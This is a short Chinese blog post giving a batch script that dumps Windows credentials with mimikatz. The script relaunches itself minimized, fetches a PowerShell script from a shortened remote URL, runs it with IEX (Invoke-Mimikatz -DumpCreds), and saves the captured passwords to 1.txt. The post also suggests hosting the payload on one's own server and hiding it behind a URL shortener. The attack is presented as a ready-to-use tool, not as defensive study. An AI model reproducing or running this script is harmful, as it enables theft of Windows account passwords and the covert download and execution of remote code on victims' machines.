一句话Powershell调用mimikatz抓取Windows密码

mimikatz简要介绍

这篇文章一句powershell调用mimikatz抓密码中提到了这种方法

个人觉得制作成bat脚本使用起来会更加方便,但是唯一的缺点还是必须使用管理员权限启动

实际使用:

如果你下载不了说明你被墙了

  • 复制访问链接如(http://x.x.x.x/getpass.ps1) 然后使用短网址生成器短链接

  • 编写bat脚本,第四行的链接地址应为你自己存放ps1脚本的地址

1
2
3
4
5
@echo off
if not "%~1"=="p" start /min cmd.exe /c %0 p&exit
cd /d %~dp0
powershell "IEX (New-Object Net.WebClient).DownloadString('http://kks.me/a5x'); Invoke-Mimikatz -DumpCreds">>1.txt

  • @echo off 不回显
  • 最小化批处理进程
  • 切换到脚本路径
  • 使用powershell调用mimikatz抓取用户密码并且将结果保存到脚本所在路径下的1.txt中
本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
Page View
⬆︎TOP